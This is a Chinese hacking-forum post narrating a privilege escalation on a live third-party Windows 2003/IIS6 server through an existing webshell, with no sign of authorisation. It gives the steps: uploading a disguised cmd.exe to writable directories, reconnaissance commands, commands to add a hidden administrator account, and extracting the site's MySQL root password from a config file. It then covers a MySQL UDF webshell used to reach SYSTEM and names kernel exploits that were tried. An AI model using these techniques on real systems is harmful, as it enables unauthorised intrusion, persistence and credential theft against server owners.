【新兵申请转正】一次实战提权（转发自己原创）

刚刚注册土司 发个帖子 求转正 这个是我前几天在其他论坛发布的帖子 原创可查

闲来没事 朋友发给我一个站 需要提权 然后那就试试吧 于是就有了接下来的文章 大牛勿喷
https://xxxxxx/……/Abstract.aspx

地址不方便公布

猜测：已经上了一个aspx的大马 看来支持aspx 那就可能有mssql环境 可能开放了1433 待会可以利用sa提权等等有关mssql的提权方法



然后打开访问看看



熟悉的界面
那我们先来搜集一下基本信息



Terminal Port :3389
Server OS :Microsoft Windows NT 5.2.3790.0
Server Software :Microsoft-IIS/6.0
Server UserName :NETWORK SERVICE
Server Time :2016-7-8 16:09:52
Server TimeZone :(GMT+08:00) 北京，重庆，香港特别行政区，乌鲁木齐
Server BIOS :American Megatrends Inc. : BIOS Date: 05/23/12 17:15:53 Ver: 09.00.06
CPU Count :4
CPU Version :Intel(R) Xeon(R) CPU E5-2670 0 @ 2.60GHz
Server upM :2.00 G
Server OS :Microsoft Windows NT 5.2.3790.0
从这里可以判断出 是win2003的服务器系统 具体请看



然后看一下其他信息 看一下 能否 执行cmd
如果可以执行cmd 那就方便不少了  各种exp大展身手 和端口信息 netstat -ano 还有系统信息 systeminfo等等都可以看



显示 拒绝访问 代表了 cmd所在的位置c:\windows\system32\cmd.exe 不可读 写入估计更不可能
这种情况 需要我们上传自己的cmd到可读可写目录

个人常常看的可读可写目录
C:\WINDOWS\Temp
C:\WINDOWS\system32 这里不行了
C:\Program Files          这个目录如果可读  可以看到安装的许多文件 非常有用 对提供思路有帮助
C:\WINDOWS
C:\Documents and Settings
e:\recycler
f:\recycler
c:\recycler
c:\Inetpub
c:\wwwroot

我简单的列举了一些 完整的敏感目录可以去上网查一下
我这里上传到了 D:\RECYCLER\1cmd.jpg       （后缀没关系 都会以exe的形式运行）


然后在cmd终端的地方填写我们的D:\RECYCLER\1cmd.jpg   


可以看到 能够执行cmd
于是搜集一下其他信息

ipconfig：查看ip
whoami：查看当前权限
systeminfo：系统信息 和大马里的差不都  还有打补丁的情况
netstat -ano：开放的端口  有时候也可以用这个来查看本机ip
tasklist：当前运行的任务进程  （想杀进程的时候用taskkill /f /im 进程名    得先确保你权限是否够大 如果是system 就能为所欲为了）
net user：查看用户  还有加用户等等 都要用到
              net user username password /add
              net localgroup administrators username /add
query user：查看用户是否在线


等等还有很多 我就稍微列举了一些 大家可以自己百度下
System Idle Process              0 暂缺                                       
System                           4 暂缺                                       
smss.exe                       376 暂缺                                       
csrss.exe                      428 暂缺                                       
winlogon.exe                   452 暂缺                                       
services.exe                   500 Eventlog, PlugPlay                          
lsass.exe                      512 HTTPFilter, PolicyAgent, ProtectedStorage,  
                                   SamSs                                       
svchost.exe                    688 DcomLaunch                                 
svchost.exe                    752 RpcSs                                       
svchost.exe                    816 Dhcp, Dnscache                              
svchost.exe                    852 LmHosts, W32Time                           
svchost.exe                    868 AeLookupSvc, CryptSvc, dmserver,            
                                   EventSystem, helpsvc, lanmanserver,         
                                   lanmanworkstation, Netman, Nla, RasMan,     
                                   Schedule, seclogon, SENS, SharedAccess,     
                                   ShellHWDetection, TrkWks, winmgmt,         
                                   wuauserv, WZCSVC                           
spoolsv.exe                    996 Spooler                                    
svchost.exe                   1020 vmicheartbeat, vmickvpexchange,            
                                   vmicshutdown, vmictimesync, vmicvss         
msdtc.exe                     1124 MSDTC                                       
svchost.exe                   1268 ERSvc                                       
inetinfo.exe                  1344 IISADMIN, MSFtpsvc                          
mysqld.exe                    1380 MySQLa                                      
svchost.exe                   1532 RemoteRegistry                              
svchost.exe                   1692 W3SVC                                       
vssvc.exe                     2008 VSS                                         
svchost.exe                   2024 TermService                                 
alg.exe                       2160 ALG                                         
w3wp.exe                      2360 暂缺                                       
wmiprvse.exe                  3496 暂缺                                       
logon.scr                     3552 暂缺                                       
csrss.exe                     3572 暂缺                                       
winlogon.exe                   296 暂缺                                       
rdpclip.exe                    716 暂缺                                       
explorer.exe                  3076 暂缺                                       
iexplore.exe                  2356 暂缺                                       
iexplore.exe                  2852 暂缺                                       
iexplore.exe                  3400 暂缺                                       
ctfmon.exe                    3280 暂缺                                       
svchost.exe                   2524 TapiSrv                                    
wmiprvse.exe                  3620 暂缺                                       
php-cgi.exe                   1632 暂缺                                       
php-cgi.exe                   3380 暂缺                                       
php-cgi.exe                   1620 暂缺                                       
php-cgi.exe                    680 暂缺                                       
wmiprvse.exe                  2948 暂缺                                       
csrss.exe                     1108 暂缺                                       
winlogon.exe                  1012 暂缺                                       
csrss.exe                     2348 暂缺                                       
winlogon.exe                   412 暂缺                                       
csrss.exe                     1392 暂缺                                       
winlogon.exe                  3044 暂缺                                       
1cmd.jpg                      3156 暂缺                                       
tasklist.exe                  2976 暂缺         

我看了一下进程 没有360大喜 然后在看开放端口时发现 并没有回显 这种情况 可能是netstat被删除了 需要我们上传自己的 然后再使用命令 常常遇到的是net user无法回显 解决办法一样但是我没上传 用大马自带的扫描端口功能粗略的扫描了一下 我认为这个站 开放端口简单看一下就行了 于是获取到如下开放端口
127.0.0.1 : 21 ................................. Open
127.0.0.1 : 80 ................................. Open
127.0.0.1 : 3306 ................................. Open
127.0.0.1 : 3389 ................................. Open

看到了3306 想到了 应该有mysql 数据库  从进程中   mysqld.exe     1380 MySQLa
发现了这个 印证了我的猜想 刚刚进程的时候还没看到，，，，




于是我决定先不用exp 去找下root  可以从 网站的配置信息中寻找 或者 从mysql的data文件夹里找 user.myd user.myi两个文件中找
从配置信息中很快得到了


        'DB_TYPE'=>'mysql',
        'DB_HOST'=>'127.0.0.1',
        'DB_NAME'=>'xxxxx',
        'DB_USER'=>'root',
        'DB_PWD'=>'phpstudymysql',
        'DB_PORT'=>'3306',
        'DB_PREFIX'=>'xt_',
//        'DB_FIELDS_CACHE'   => true,//设置是否启用数据库字段缓存


看见密码 他应该用的是phpstudy集成的吧 然后上udf.php 提权马

这个错误是因为 mysql版本高 从mysql 5.1起 需要dll导出到安装的目录下特定的文件夹中 lib/plugin中
但是这个udf马不能导出到自定义的位置  

于是我换一个大马

然而打开大马的时候发现 好像也是因为php版本太高 PHP Deprecated 屏蔽  产生了错误
接连换了几个大马都是这样
最后 还是选择了tools.php的一个udf提权马 也能用 还能导出到自定义位置

然后就拿到了system权限


然后就拿到了服务器 那我们来试试exp能否 获得最高权限


最后试了好多exp iis6 iis7 巴西烤肉 pr ms15-051 等等 都未果 看来补丁都打上了


说明:
1.本人是学生，一直仰慕t00ls 愿意在这里尽我的能力帮助他人
2.各位前辈辛苦了，感谢你们的努力。
3.有哪里不对的请指出 非常希望得到你们的建议和指点
4.希望通过   我将好好努力，毫无保留的与大家交流。